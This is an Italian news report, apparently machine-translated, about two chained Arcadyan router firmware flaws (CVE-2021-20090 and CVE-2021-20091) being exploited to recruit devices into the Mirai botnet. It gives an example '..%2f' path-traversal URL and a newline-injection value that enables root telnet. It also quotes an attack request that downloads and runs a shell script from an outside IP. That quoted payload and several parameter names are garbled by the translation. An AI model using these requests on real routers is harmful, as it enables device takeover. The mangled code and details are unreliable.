Sulla rete è stato registrato un attacco massiccio contro router domestici il cui firmware utilizza un'implementazione del server HTTP dell'azienda Arcadyan. Per ottenere il controllo sui dispositivi, viene utilizzata una combinazione di due vulnerabilità che consente l'esecuzione remota di codice arbitrario con diritti di root. Il problema riguarda una gamma abbastanza ampia di router ADSL di Arcadyan, ASUS e Buffalo, nonché i dispositivi forniti con i marchi Beeline (il problema è confermato in Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone e altri operatori di telecomunicazioni. Va notato che il problema è presente nel firmware Arcadyan da più di 10 anni e durante questo periodo è riuscito a migrare su almeno 20 modelli di dispositivi di 17 produttori diversi.
La prima vulnerabilità, CVE-2021-20090, consente di accedere a qualsiasi script dell'interfaccia web senza autenticazione. L'essenza della vulnerabilità è che nell'interfaccia web alcune directory attraverso le quali vengono inviate immagini, file CSS e script JavaScript sono accessibili senza autenticazione. In questo caso le directory per le quali è consentito l'accesso senza autenticazione vengono verificate utilizzando la maschera iniziale. La specifica dei caratteri "../" nei percorsi per accedere alla directory principale è bloccata dal firmware, ma l'utilizzo della combinazione "..%2f" viene saltato. Pertanto, è possibile aprire pagine protette quando si inviano richieste come “http://192.168.1.1/images/..%2findex.htm”.
La seconda vulnerabilità, CVE-2021-20091, consente a un utente autenticato di apportare modifiche alle impostazioni di sistema del dispositivo inviando parametri appositamente formattati allo script apply_abstract.cgi, che non verifica la presenza di un carattere di nuova riga nei parametri . Ad esempio, durante l'esecuzione di un'operazione ping, un utente malintenzionato può specificare il valore "192.168.1.2%0AARC_SYS_TelnetdEnable=1" nel campo con l'indirizzo IP da verificare e lo script, durante la creazione del file di impostazioni /tmp/etc/config/ .glbcfg, scriverà al suo interno la riga "AARC_SYS_TelnetdEnable=1", che attiva il server telnetd, che fornisce accesso illimitato alla shell dei comandi con diritti di root. Allo stesso modo, impostando il parametro AARC_SYS, è possibile eseguire qualsiasi codice sul sistema. La prima vulnerabilità rende possibile eseguire uno script problematico senza autenticazione accedendovi come “/images/..%2fapply_abstract.cgi”.
Per sfruttare le vulnerabilità, un utente malintenzionato deve essere in grado di inviare una richiesta alla porta di rete su cui è in esecuzione l'interfaccia web. A giudicare dalla dinamica di diffusione dell'attacco, molti operatori lasciano l'accesso ai propri dispositivi dalla rete esterna per semplificare la diagnosi dei problemi da parte del servizio di supporto. Se l'accesso all'interfaccia è limitato alla sola rete interna, è possibile effettuare un attacco da una rete esterna utilizzando la tecnica del “DNS rebinding”. Le vulnerabilità vengono già utilizzate attivamente per connettere i router alla botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; arricciatura+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Fonte: opennet.ru